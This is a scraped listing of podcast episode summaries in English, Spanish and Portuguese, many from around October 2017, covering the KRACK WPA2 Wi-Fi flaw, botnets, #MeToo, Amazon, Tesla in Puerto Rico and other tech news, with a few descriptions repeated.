video and some help (http://dpaste.com/3WDNV05#wrap) Eric - ZFS monitoring (http://dpaste.com/2RP0S60#wrap) Tom - BSD Hosting (http://dpaste.com/31DGH3J#wrap) ***
What the Kracked hack of WPA2 wireless systems means for IT networks. A new botnet threatening audio visual networks. Video available below Host: Tim Albright Guests: Bradford Benn – Bradford Benn’s website Michael Drainer – Drainer Technologies Derek Joncas – Extron Electronics Links to sources: Fast Company – Krack WPA2 hack Spiceworks – New botnet, [...]
What the Kracked hack of WPA2 wireless systems means for IT networks. A new botnet threatening audio visual networks. Video available below Host: Tim Albright Guests: Bradford Benn – Bradford Benn’s website Michael Drainer – Drainer Technologies Derek Joncas – Extron Electronics Links to sources: Fast Company – Krack WPA2 hack Spiceworks – New botnet, [...]
Erik and Bob take your computer questions while taking a trip down memory lane with an old "Website of the Week" from the 1990s--"Dumb Laws"--a website which deals with quirky laws still on the books. "KRACK" flaw in wireless WPA2 security leaves wireless networks vulnerable to hacking. Troubleshooting a crackling noise from a Samsung Galaxy tablet. Artificial Intelligence robot criticizes Elon Musk for his views on AI. Erik explains the difference between a wireless router and a wireless access point while helping a listener configure his wireless network. Troubleshooting problems sending e-mail from a browser on a laptop computer. Erik and Bob help a listener with wireless printing issues set the printer "IP address" manually.
Ya estamos aquí, otra semana mas, para traer las noticias mas interesantes que hemos visto del mundo de la tecnología, cine, series y todo lo que nos gusta. También hacemos una recomendación de los podcast que mas escuchamos ya que ésta semana tuvimos el día del podcast. Para mas información podéis visitar: www.frikismopuro.com
This week, speaking out on sexual harassment, Tesla sends power to Puerto Rico, protected WiFi is now vulnerable to eavesdropping, the battle for the net, giant robots duke it out!, and much more. What We're Playing With Andy: Local Library e-media resources (Kanopy) Dwayne: Amazon in Denver? Headlines Tesla starts shipping Powerpacks to Puerto Rico Movies Anywhere App Launches With Joint Studio Backing Severe flaw in WPA2 protocol leaves Wi-Fi traffic open to eavesdropping Qualcomm Seeks China iPhone Ban, Expanding Apple Legal Fight Apple to appeal five-year-long patent battle after $439.7 million loss Battle for the Net Audible Book of the Week The Siege of Abythos (Chronicles of the Black Gate, Book 3) by Phil Tucker Sign up at AudibleTrial.com/TheDrillDown Music Break: Fighter by Christina Aguilera Hot Topic: #MeToo Celebrities Join Twitter Boycott in Solidarity with Rose McGowan Twitter CEO promises to crack down on hate, violence and harassment with “more aggressive” rules A Black Woman Created the “Me Too” Campaign Against Sexual Assault 10 Years Ago Sexual Assault Movement #MeToo Reaches Nearly 500,000 Tweets On harassment in the film world: where do we go from here? Amazon Studios exec Roy Price resigns after sexual harassment claim Music Break: A Cruel Angel's Thesis by Yoko Takahashi Final Word How Google's Quantum Computer Could Change the World The Drill Down Videos of the Week The Giant Robot Duel: Megabots vs. Suidobashi Subscribe! The Drill Down on iTunes (Subscribe now!) Add us on Stitcher! The Drill Down on Facebook The Drill Down on Twitter Geeks Of Doom's The Drill Down is a roundtable-style audio podcast where we discuss the most important issues of the week, in tech and on the web and how they affect us all. Hosts are Geeks of Doom contributor Andrew Sorcini (Mr. BabyMan), marketing research analyst Dwayne De Freitas, and Box product manager Tosin Onafowokan.
O papo dessa semana é sobre a falha do WPA2, a chegada da Amazon no Brasil, o Microsoft Suface Book 2, e as pedras nos rins e o Apple Pencil do Bruno.
When you set up a new Wi-Fi network, you're probably conditioned by now to check the "WPA2" box. You may not specifically know when or why someone advised you to do this, but it was solid advice. Wi-Fi Protected Access 2 is the current industry standard that encrypts traffic on Wi-Fi networks to thwart eavesdroppers. And since it's been the secure option since 2004, WPA2 networks are absolutely everywhere. They're also, it turns out, vulnerable to cryptographic attack.
WPA2 security protocol has been cracked-is anything safe anymore?, The Amazon CEDIA partnership and You, and CCTV systems have hacked. Video available below Host: Matt D. Scott Guests: Joe Whitaker – The Thoughtful Home website Hagai Feiner- Access Network Website Mitchell Klien – Z Wave website Michael Bridwell- Michael Bridwell LinkedIn Links to sources: Residential [...]
WPA2 security protocol has been cracked-is anything safe anymore?, The Amazon CEDIA partnership and You, and CCTV systems have hacked. Video available below Host: Matt D. Scott Guests: Joe Whitaker – The Thoughtful Home website Hagai Feiner- Access Network Website Mitchell Klien – Z Wave website Michael Bridwell- Michael Bridwell LinkedIn Links to sources: Residential [...]
Capturing a great sunset photos (HDR essential, great compostion, stabilization), Wi-Fi essentials (WPA2, don't get spoofed, forget dangerous networks), teaching kids to code (Googgles Made with Code, Media Labs Scratch, Hour of Code, Code.org, Khan Academy), Profiles in IT (Bob Miner, architect of Oracle database), fake news articles (Google and Facebook respond), Presidential election IT lessons (big data wins, social medial is king, need for cybersecurity), London killer fog (pollution seeds sulfuric acid mist, China beware), AI optimizes traffic light timing (reduced commute time, piloted in Pittsburgh PA), Suns tilt explained (ninth planet proposed, 10 times Earth mass, orbit tilted 30 degrees), and CERN Physicist addresses birth control (advanced statistical analysis perfects rhythm method). This show originally aired on Saturday, November 19, 2016, at 9:00 AM EST on WFED (1500 AM).